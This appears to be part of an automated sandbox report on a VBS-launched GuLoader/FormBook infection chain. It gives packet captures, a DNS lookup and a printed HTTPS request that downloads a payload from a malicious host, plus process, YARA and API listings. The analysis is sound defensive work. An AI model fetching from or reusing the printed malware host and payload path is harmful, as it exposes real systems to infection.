Sep 26, 2024 09:30:11.850857973 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.850886106 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.850954056 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.851025105 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.851197958 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.851249933 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.851377010 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.851377964 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.851423979 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.851423979 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.851444960 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.851471901 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.851571083 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.851619959 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.851838112 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.851877928 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.851996899 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.852066040 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.852087975 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.852158070 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.852247000 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.852427959 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.852462053 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.852663040 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.852792978 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.852818966 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.852922916 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.853005886 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.853106022 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.853132010 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.853173018 CEST	443	49756	170.249.236.53	192.168.11.20
Sep 26, 2024 09:30:11.853247881 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.853406906 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.853470087 CEST	49756	443	192.168.11.20	170.249.236.53
Sep 26, 2024 09:30:11.853509903 CEST	443	49756	170.249.236.53	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 09:30:10.549612999 CEST	57841	53	192.168.11.20	1.1.1.1
Sep 26, 2024 09:30:10.788326979 CEST	53	57841	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 09:30:10.549612999 CEST	192.168.11.20	1.1.1.1	0xec4a	Standard query (0)	secretspark.com.bd	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 09:30:10.788326979 CEST	1.1.1.1	192.168.11.20	0xec4a	No error (0)	secretspark.com.bd		170.249.236.53	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

secretspark.com.bd

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49756	170.249.236.53	443	560	C:\Users\user\AppData\Local\Temp\temp_executable.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:30:11 UTC	181	OUT	GET /sCvgayhFHxN196.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: secretspark.com.bd Cache-Control: no-cache
2024-09-26 07:30:11 UTC	404	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Mon, 23 Sep 2024 16:31:31 GMT accept-ranges: bytes content-length: 336448 date: Thu, 26 Sep 2024 07:30:11 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-09-26 07:30:11 UTC	964	IN	Data Raw: 68 5b 13 6d c2 64 97 b5 68 02 e5 a7 fc f2 08 d7 5d 85 97 0f 01 da 52 9a 6a 46 6c 81 8e 63 5e e7 35 a1 d2 35 66 89 15 17 88 53 13 2f 16 0d f8 47 b8 4b 62 9f 45 94 66 c5 ce ed 0d c8 77 10 ad 10 a5 16 73 56 c3 35 c0 aa b4 52 a9 b9 c1 cf 28 32 d5 4d d6 47 11 0c 37 0b 35 56 71 89 cc 85 32 57 5a 81 89 74 76 95 b0 4e 7f cb 41 bc 5c 10 58 d0 5a 72 c9 02 b8 fa a2 17 eb 62 82 d4 bf 97 91 93 8b b1 df 26 74 14 c7 8d 85 48 0e 93 94 0a 07 24 3f bb 18 72 2d 02 3c ae 5a d2 73 09 1d 86 05 56 5c 5d 19 b8 e2 4d 37 de cf 5a 69 fc b0 dc fe 4d 81 c2 f2 ef f4 76 ae 5b e7 76 97 76 d7 89 12 f1 ae ee 39 e4 f2 f6 3e f3 4c de d5 7f 02 e6 92 c3 0d c0 31 2b 58 25 c2 31 29 8c 56 37 d6 97 53 57 38 6c d8 f5 8f 4b 58 18 17 e4 28 a6 6c d8 db a6 e6 62 01 81 03 3d 48 d0 0b 9c 7e be 41 03 ef Data Ascii: h[mdh]RjFlc^55fS/GKbEfwsV5R(2MG75Vq2WZtvNA\XZrb&tH$?r-<ZsV\]M7ZiMv[vv9>L1+X%1)V7SW8lKX(lb=H~A
2024-09-26 07:30:11 UTC	14994	IN	Data Raw: b3 15 c2 a5 62 4d 52 9b c2 87 45 1a 62 72 5f 79 36 63 8a d2 58 07 31 38 c2 91 0d c5 4a 05 7a 48 03 36 ab c6 a0 99 7b 6c ab 25 09 3a 09 dd bd 29 81 d1 c8 99 c6 97 58 87 36 c5 0f 7c 97 a9 94 ce 0f 29 0f 0c 08 f4 a3 14 c0 4f 5e 80 36 89 5a 38 65 e8 7e 12 2b c2 90 2c 87 43 2f c6 64 9b 4a 9e 58 6f df 06 29 cb e6 09 0c 50 eb c5 50 2a 92 a5 e0 c1 34 45 0a 29 b8 60 ed 51 09 49 fc 91 50 95 c2 60 cf 03 d3 41 98 b9 ad 18 c7 e7 7e 45 15 c9 1a 4f c1 f9 90 17 c3 86 a2 4f 40 ee ec 14 d0 a7 e2 c5 f9 e2 cd 91 6b 19 83 3a c1 4b 77 54 6d 65 97 f4 93 90 0f c1 0d 2e 78 4b 2f d1 d5 fc aa 3d b2 3e a3 eb a7 21 a8 ec 31 c5 df ae fe 4f 7d b4 46 9b 29 02 a6 56 4d 12 4e 1e b7 16 8f 63 15 2a d4 15 68 e9 e0 36 f7 ea d9 28 93 96 72 e1 e2 9a 90 2a e9 3b 4d 72 0f 82 07 ce f7 5b 7f 95 ae Data Ascii: bMREbr_y6cX18JzH6{l%:)X6\|)O^6Z8e~+,C/dJXo)PP4E)`QIP`A~EOO@k:KwTme.xK/=>!1O}F)VMNch6(r*;Mr[
2024-09-26 07:30:11 UTC	16384	IN	Data Raw: 48 db 3f 16 57 90 40 99 e8 fc 50 13 81 e4 cc 2e 63 6e ea 33 26 03 33 7b d9 a0 b7 a7 d8 fe 26 5b 35 90 72 6d 7e 83 66 4c 60 f7 02 74 89 be 42 67 d8 86 45 e4 a1 fe c6 65 cb 94 89 ec ff 5b 8f be 9a d3 ed fe 71 72 8e e3 21 4e d3 ae ec b3 78 82 9d 19 0b e5 af c5 fd 59 ac 8c 55 6e f3 4d 7e 0a ca 50 60 88 64 f9 f9 6e 0c b7 43 19 ad 77 75 54 92 91 7c 9d 13 3c 8a 04 8c 7c dc 9b 22 d5 43 ad 91 28 f7 82 1a eb fa b2 06 5b d5 f5 cf 28 0c 6f 69 df 1f cc 44 e2 58 82 64 64 4e 9d 45 16 e1 52 84 a9 5f 8d 00 4a 61 78 dd 01 ca c0 1b a9 76 ad fa b2 54 ff 41 dd 18 22 5f 06 f3 b3 10 63 20 e0 f6 72 ef 75 5b a4 ef 34 e8 5b af 32 b2 0b a4 a6 95 73 97 8a 0a ce 56 5c 54 86 32 49 e1 3f f0 2b d8 7e e1 74 3e f4 4a 81 eb ce e4 1c d5 4d 08 7c 40 ab f6 bc e9 c4 5b 81 53 32 88 a0 e7 f7 35 Data Ascii: H?W@P.cn3&3{&[5rm~fL`tBgEe[qr!NxYUnM~P`dnCwuT\|<\|"C([(oiDXddNER_JaxvTA"_c ru[4[2sV\T2I?+~t>JM\|@[S25
2024-09-26 07:30:11 UTC	16384	IN	Data Raw: fb 5b 23 2c 87 42 8e 62 e2 1f 9d 7d 14 75 b4 b4 f5 e2 51 ab 57 cb 52 d5 62 db 54 81 83 ea 24 38 d4 41 d8 54 4d 26 dc f1 6e 1a d5 16 16 89 a5 d3 b4 6d 61 fa 8f 25 b5 07 c8 a9 e8 76 ec db a4 cc b4 7e d4 ed 88 10 89 ec a5 81 ab e8 2a 04 89 ce e6 17 16 aa d0 36 c6 04 19 da 34 ae 1d 10 0a f4 df 21 a2 b4 02 29 4b 60 0d 7c 90 7b 18 1e 1a d8 69 b6 04 22 e2 91 f7 0f 14 14 fc c8 77 5b bc 5e 4a 0f c3 ae 2f 5d 78 be 84 cb 8e 60 be 14 54 2c 9b 8e 47 c0 8c 86 6c e2 92 c8 d3 32 fa 39 62 a7 0b 77 ca fb be 3d 35 5d 87 1e 02 cc 31 49 41 0e fa 29 0d 9b ef ff 51 07 d0 a1 44 74 4a 20 ec a2 c3 fc 74 fa 0f 9e ab e6 e1 e9 83 bd 4b f9 31 1c 44 40 2d fd 8c e9 1c e0 e1 cc d5 10 21 d9 0e d3 f8 bd db 02 ee b0 48 5a ee a6 61 bb 63 f4 2b cd 78 73 cc f5 46 ae 9e 27 9f 9a eb e7 f1 0c 08 Data Ascii: [#,Bb}uQWRbT$8ATM&nma%v~*64!)K`\|{i"w[^J/]x`T,Gl29bw=5]1IA)QDtJ tK1D@-!HZac+xsF'
2024-09-26 07:30:11 UTC	16384	IN	Data Raw: 9c 26 bd 24 92 b3 dd dd d3 1f 18 d2 2f a9 b2 6a 2a 55 17 2f 1a 75 42 7c 97 57 db 4d 5d 7e a3 da 39 57 63 e8 26 98 fe ab 6b 46 3f 4e 27 ad 75 2e 20 3d 30 52 57 d2 b8 78 3e a0 61 e5 b4 e8 ff 76 04 c6 84 8d 7f d7 8e 57 dc ce 76 c9 15 67 ab 2f 8f 5e 57 5b be 01 06 0d 55 80 5f 28 3c 2b 36 9b 8b 9d 4d 0e 04 96 9e f2 6e fe 32 6c 03 4c 7d f2 34 d9 ad 58 fe 0f 5a 0c 78 60 73 f0 47 87 3b 0d 46 13 6c 01 6d 5e 4f 08 38 fd 01 36 05 8b 69 23 c4 49 1e 8e 90 0a ad 79 e4 06 a3 f9 a2 7d 72 3c 29 d9 d4 b8 00 cf 30 3e 5d 13 cf e6 c2 d3 cb 21 8c 40 bd f5 7a d5 f4 b9 3e b6 57 7c 62 35 09 3b 8c ea 7e 6d fc 06 4b a5 e6 51 39 33 2e e0 70 7c 55 f5 59 ad 16 b6 d1 fe 5d 9f 66 1b 1b c0 29 3d dd 2d 9b 4e 6c df 90 f8 9e 6c a3 e3 98 ec e7 61 d4 5e 81 bf ef 3d 38 bb 50 1e b3 65 a7 fd bd Data Ascii: &$/j*U/uB\|WM]~9Wc&kF?N'u. =0RWx>avWvg/^W[U_(<+6Mn2lL}4XZx`sG;Flm^O86i#Iy}r<)0>]!@z>W\|b5;~mKQ93.p\|UY]f)=-Nlla^=8Pe
2024-09-26 07:30:11 UTC	16384	IN	Data Raw: 97 60 07 e2 c6 3b 59 30 1b f4 38 d7 b9 0e d8 67 12 ae 06 8d d9 3f c4 6e df a5 ae 8c 77 59 9f 10 18 6b 00 02 16 90 1e 22 ae d6 b9 62 6f 55 96 f8 b1 8a 39 fa 93 96 c6 28 6b 75 a8 04 08 f0 61 96 06 be b6 49 50 c3 ff 7e 38 c7 a9 9f c8 91 76 0a cc 7e 51 96 a9 5e db 50 fd c5 c6 bb 98 fe fc 87 85 ee 01 67 4d ea 1c 38 a9 be be a2 0f 3e 27 83 a4 4e 35 fb 7f 88 ba 0d ed c0 db 38 93 4a ea c7 be e4 a2 51 24 f7 55 78 70 5b b5 8f f6 35 40 1f be a5 f3 53 88 ae 84 9a f1 fe 12 8f 2f ff f6 d6 49 a8 13 41 c2 47 35 89 90 b2 a8 81 fc 93 ac f2 c8 4b d4 8d 2f 65 b9 31 0f fb 9c d0 71 a2 bc 90 b3 be c9 bd e5 4d f7 e2 0b 70 46 b1 6c 32 85 87 69 99 7c 21 3d f4 6d 5d 32 10 aa 72 55 27 ae 07 a4 ca c4 b7 1e 5b 61 a1 d8 61 1b 51 f2 94 43 fe 1a ef d3 42 38 b0 b2 e1 42 92 97 92 61 d1 51 Data Ascii: `;Y08g?nwYk"boU9(kuaIP~8v~Q^PgM8>'N58JQ$Uxp[5@S/IAG5K/e1qMpFl2i\|!=m]2rU'[aaQCB8BaQ
2024-09-26 07:30:11 UTC	16384	IN	Data Raw: 9c e5 3b 07 2a 83 9e fe 33 ac 46 5e 5a 5c f6 0b 5d 8b dc 3e a1 61 2e 1e 39 35 4a e9 29 c1 dd 99 57 66 c8 15 cc bf ef 40 bf 4d a9 4e e3 da 16 d5 21 c2 c2 c6 95 49 c4 e9 4f ae 24 43 11 10 f9 f8 43 dd c1 f8 60 83 ed 5e 05 ff 67 c2 26 c5 6d 76 2a f9 77 d1 c5 8f 8d 33 6c 0e f3 2a 6f 09 4a c8 83 ad 54 06 d3 62 1e 26 26 f2 bf d7 8b ee 04 0e 97 d8 d9 50 13 c8 83 dd f9 35 0b e1 05 59 3f a9 32 57 34 db fb b5 62 ed 48 88 d8 2f fc 4e 07 c2 76 35 fe 6d 0d 03 15 d0 ae 5e 2a 16 8e 9f b7 80 ca cb a2 19 a6 1f d2 12 c8 d1 45 17 c3 a8 7a fb 64 67 0c 0a 38 39 89 dd 1c b7 4b 7a 07 bb 82 9c cf c9 71 b5 73 a4 61 91 05 ee fc cd 89 4d 77 a9 54 46 39 ee ce 05 ea 36 f2 42 01 bc 62 b9 2a 51 1f 0a 50 d9 d3 da a1 05 2c ae d4 15 20 03 ff ca 88 bd c9 67 21 48 a0 dc 8a 16 10 a2 f7 bc 55 Data Ascii: ;3F^Z\]>a.95J)Wf@MN!IO$CC`^g&mvw3loJTb&&P5Y?2W4bH/Nv5m^Ezdg89KzqsaMwTF96Bb*QP, g!HU
2024-09-26 07:30:11 UTC	16384	IN	Data Raw: 86 00 8d 46 ea ba 64 68 7e 28 e3 6d 9a 60 bb 2a d4 9c 25 cd 42 32 cf 16 f8 3c e9 4d 64 c3 c9 ac 57 6a fa 8d d3 b1 0f 1f 2e 9e ea 6f 53 e4 3b a9 41 a3 95 b5 02 4a 9c c1 b2 b0 5e a3 2c c3 7e 37 6e d0 22 f7 52 bd 5a 96 a9 5d 6d 4b 9e 65 0e 86 68 b2 ef 71 6b ed 93 3c 6b f3 44 5b 93 08 15 fb cf 4a 4f e6 47 15 da 4f be 76 43 31 dd 51 89 e9 b3 71 0a 19 0d 4e 8c 7b b3 f8 15 00 43 d9 2c 42 30 75 6d a4 9f a2 fd af 7f b3 ef 50 43 94 a5 e3 8d 56 e2 46 e1 04 65 65 20 c5 fe b7 ab 79 5e 00 c9 ee e8 d9 f1 6d 89 21 da 77 b2 91 a3 85 f9 a5 05 be d6 30 a4 8d b0 4f 58 80 ef 35 6f c6 3e d6 fa 84 b4 13 53 a9 46 be ef a7 9d e1 7b 64 2c ca e0 83 a6 c2 1b 85 5f b2 ef 4a 19 77 c3 ea f7 b3 f5 23 a9 e1 57 29 28 73 dc b4 4e fa d9 cf 27 9b 40 25 22 52 a4 ed f1 e0 a3 0b 31 cb 98 5f 99 Data Ascii: Fdh~(m`*%B2<MdWj.oS;AJ^,~7n"RZ]mKehqk<kD[JOGOvC1QqN{C,B0umPCVFee y^m!w0OX5o>SF{d,_Jw#W)(sN'@%"R1_
2024-09-26 07:30:11 UTC	16384	IN	Data Raw: 3f 37 75 ef 6c 48 d0 42 36 34 51 d2 dc c3 60 26 88 8c ef a9 6c f0 cb 5e 22 a0 d4 f5 38 a9 b9 f5 6d 31 a3 b1 7b 94 c1 d7 26 bb bb 87 14 fb 64 5d 2e 53 af 13 13 5e b5 b7 24 15 8e d8 ab 36 d1 58 cf 40 19 82 91 12 d2 08 26 a7 d4 7a 43 5f c0 ef 50 e8 e2 44 f9 a5 59 9a ef b6 e6 32 d3 ed 28 43 0f 36 b5 8c f5 e6 b6 9e c8 c7 3c 68 6d 7e 88 de b9 83 00 a1 33 dc 4b 59 d8 d2 4e 9f 36 0c da 76 b7 68 e8 ec 38 51 e0 dc b2 a6 96 53 20 1e 2f 4d 33 64 d8 59 d9 53 76 fa 47 32 d6 4c 24 da 08 b7 40 ea 4e 64 ee 64 da 30 03 d1 89 7a 54 0e 52 15 06 9c 73 3c 6e 5b 35 1c 93 c9 89 93 80 2f 79 f6 5e fe da 61 b5 f4 4a 5f 00 77 53 96 f0 f4 e3 83 43 25 e0 6c 4f 80 ed 27 d9 42 63 67 2e c3 31 58 c2 37 3d 57 ef 1d 0e 2e 92 27 8e b5 da e0 ff da 3d 0a 7d dc ac 90 61 b4 f6 b1 81 67 00 a4 d5 Data Ascii: ?7ulHB64Q`&l^"8m1{&d].S^$6X@&zC_PDY2(C6<hm~3KYN6vh8QS /M3dYSvG2L$@Ndd0zTRs<n[5/y^aJ_wSC%lO'Bcg.1X7=W.'=}ag
2024-09-26 07:30:11 UTC	426	IN	Data Raw: 29 ae ba c6 93 22 aa 4a 85 9e 31 20 b6 9d 5b 06 08 d9 35 ad 30 8b 58 7e 3b 07 8a 05 66 e4 7f 9e b5 df 0c 0f af f5 d0 62 23 e6 ef 60 bc f5 03 47 a9 4e 25 bb 42 a3 7d c4 27 40 c5 31 73 53 a4 0f b8 d3 a7 e6 04 3a 41 b3 1f 52 1d c8 ea 8f 16 2d ad 43 eb c6 44 8e 5b b3 37 3f f6 50 65 a3 0b 5b b0 48 96 bf 9e 45 4d 88 0b 0f 51 53 e5 ac 96 20 23 c3 c7 54 3c 82 63 57 38 b2 db 11 0b 66 a2 e5 19 07 f2 f8 36 e7 12 8f f0 56 c1 2c 1e 57 dd 6e 09 9b f8 06 1f a7 c1 83 d0 98 93 14 f5 5d ba 74 d5 c2 3f 44 5e 65 74 bb 3a 64 66 78 94 95 59 a4 59 ba 47 4c 68 d9 c8 71 7a 32 8d 63 bb 34 8e b7 f8 4a ff 96 92 f3 fe b0 5c 7e 91 29 8f 86 28 37 ea 1b 6e 34 7a ed 84 c9 3f 3e d7 24 d9 ac 5b da 05 36 83 57 3f a9 bd 83 22 1c 85 4a 87 99 39 a5 0e 64 17 ea 00 4f a9 88 83 c4 8e 27 1d 14 46 Data Ascii: )"J1 [50X~;fb#`GN%B}'@1sS:AR-CD[7?Pe[HEMQS #T<cW8f6V,Wn]t?D^et:dfxYYGLhqz2c4J\~)(7n4z?>$[6W?"J9dO'F

Target ID:	0
Start time:	03:29:28
Start date:	26/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment copy.vbs"
Imagebase:	0x7ff6a6520000
File size:	170'496 bytes
MD5 hash:	0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:29:33
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Imagebase:	0x400000
File size:	1'098'840 bytes
MD5 hash:	4648A0278BD003C324FCD7E7779DCF99
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.13293637281.00000000035AB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:30:05
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Imagebase:	0x400000
File size:	1'098'840 bytes
MD5 hash:	4648A0278BD003C324FCD7E7779DCF99
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.13517983847.0000000033620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.13517983847.0000000033620000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:30:24
Start date:	26/09/2024
Path:	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
Imagebase:	0x140000000
File size:	16'696'840 bytes
MD5 hash:	731FB4B2E5AFBCADAABB80D642E056AC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	03:30:25
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmdkey.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cmdkey.exe"
Imagebase:	0x1f0000
File size:	17'408 bytes
MD5 hash:	6CDC8E5DF04752235D5B4432EACC81A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.15051779853.0000000002930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.15051779853.0000000002930000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.15051694421.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.15051694421.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:32:58
Start date:	26/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff68de20000
File size:	4'849'904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	15.7%
Signature Coverage:	20.2%
Total number of Nodes:	1469
Total number of Limit Nodes:	35

Executed Functions

Function 004030E2 Relevance: 77.3, APIs: 27, Strings: 17, Instructions: 324
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403103
SetErrorMode.KERNELBASE(00008001), ref: 0040310E
OleInitialize.OLE32(00000000), ref: 00403115

Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
Part of subcall function 00405EBC: LoadLibraryA.KERNELBASE(?,?,?,00403127,00000008), ref: 00405ED9
Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA

SHGetFileInfoA.SHELL32(004287E0,00000000,?,00000160,00000000,00000008), ref: 0040313D

Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,Pseudosymmetry Setup,NSIS Error), ref: 00405B9E

GetCommandLineA.KERNEL32(Pseudosymmetry Setup,NSIS Error), ref: 00403152
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000), ref: 00403165
CharNextA.USER32(00000000,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000020), ref: 00403190
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040328D
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040329E
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032AA
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032BE
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032C6
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032D7
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032DF
DeleteFileA.KERNELBASE(1033), ref: 004032F3
OleUninitialize.OLE32(?), ref: 004033A1
ExitProcess.KERNEL32 ref: 004033C1
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000,?), ref: 004033CD
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp), ref: 004033D9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033E5
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033EC
DeleteFileA.KERNEL32(004283E0,004283E0,?,0042F000,?), ref: 00403445
CopyFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\temp_executable.exe,004283E0,00000001), ref: 00403459
CloseHandle.KERNEL32(00000000,004283E0,004283E0,?,004283E0,00000000), ref: 00403486
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,?), ref: 004034DB
ExitWindowsEx.USER32(00000002,00000000), ref: 00403517
ExitProcess.KERNEL32 ref: 0040353A

Strings

TEMP, xrefs: 004032D2
C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit, xrefs: 0040337E
C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens, xrefs: 00403272, 00403373, 004033F2, 004033FB
\Temp, xrefs: 004032A4
C:\Users\user\AppData\Local\Temp\, xrefs: 00403282, 00403287, 0040329D, 004032A9, 004032B8, 004032C5, 004032D1, 004032D9, 004033CC, 004033D8, 004033E4, 004033EB, 0040349A
Error launching installer, xrefs: 00403359
", xrefs: 004031B5
C:\Users\user\AppData\Local\Temp\temp_executable.exe, xrefs: 00403454
"C:\Users\user\AppData\Local\Temp\temp_executable.exe" , xrefs: 00403158, 0040315E, 00403317
SeShutdownPrivilege, xrefs: 004034ED
1033, xrefs: 004032EE
~nsu.tmp, xrefs: 004033C7
Pseudosymmetry Setup, xrefs: 00403148
NSIS Error, xrefs: 00403143
C:\Users\user\AppData\Local\Temp, xrefs: 004033D2, 004033D7, 004033FA
TMP, xrefs: 004032DA
Low, xrefs: 004032C0

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

